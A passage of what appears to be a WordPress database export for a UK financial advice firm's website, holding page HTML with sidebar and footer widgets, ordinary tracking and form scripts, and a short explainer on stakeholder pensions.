id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"ae303bb723\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"35\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer><footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','&#13;\n	When is your Staging Date Social Advisors','Read about','publish','closed','closed','','when-is-your-staging-date-social-advisors','','','2017-09-21 16:34:41','2017-09-21 16:34:41','',0,'http://www.equalitywalk.org.uk/when-is-your-staging-date-social-advisors',0,'page','',0),(107,1,'2017-09-21 16:34:41','2017-09-21 16:34:41','<body class=\"page page-id-103 page-child parent-pageid-25 page-template page-template-side-navigation-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-103 current_page_item menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Stakeholder Pensions										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/pensions\" title=\"Pensions\">Pensions</a></li><li>Stakeholder Pensions</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:left;\">&#13;\n				<div id=\"post-103\" class=\"post-103 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Stakeholder Pensions</span>&#13;\n			<span class=\"updated\" style=\"display: none;\">June 19th, 2017</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<p/>&#13;\n<h4>A stakeholder pension is a low-cost pension which has to meet certain standards and conditions.</h4>&#13;\n<p>Pension providers cannot charge more than 1% of the value of the individuals fund each year for administering the pension.</p>&#13;\n<p>It will also have to meet the same conditions as other personal pensions.</p>&#13;\n<p>For some people a stakeholder pension may be a better option than other <a title=\"Personal Pensions\" href=\"/2012/pensions/personal-pensions\" data-bitly-type=\"bitly_hover_card\">personal pensions</a>. Stakeholder pensions offer greater flexibility than other personal pensions, for example, you can stop paying into the scheme without having to pay a penalty and restart whenever you wish. You may also be able to vary the timing and amount of your payments to the scheme.</p>&#13;\n<p>Stakeholder pensions are available from personal pension providers, for example, insurance companies, banks and building societies. Other organisations, for example, trade unions and the Post Office may also offer stakeholder pension schemes to their members. If you are employed, you may be able to get a stakeholder pension through your employer.</p>&#13;\n<p>You can also choose to join a different stakeholder pension scheme to the one offered by your employer.</p>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"float:right;\">&#13;\n		<ul class=\"side-nav\"><li><a href=\"/pensions\" title=\"Back to Parent Page\">Pensions</a></li>&#13;\n						<li class=\"page_item page-item-134\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a></li>&#13;\n<li class=\"page_item page-item-131\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n<li class=\"page_item page-item-137\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n<li class=\"page_item page-item-125\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n<li class=\"page_item page-item-90\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n<li class=\"page_item page-item-707\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n<li class=\"page_item page-item-189\"><a href=\"/pensions/personal-pensions\">Personal Pensions</a></li>&#13;\n<li class=\"page_item page-item-93\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n<li class=\"page_item page-item-103 current_page_item\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n					</ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"/seven-deadly-investment-sins\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/mortgage-strategic-alliance\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/esmart-money-januaryfebruary-2014-issue\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/how-much-money-can-i-get-pension\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" 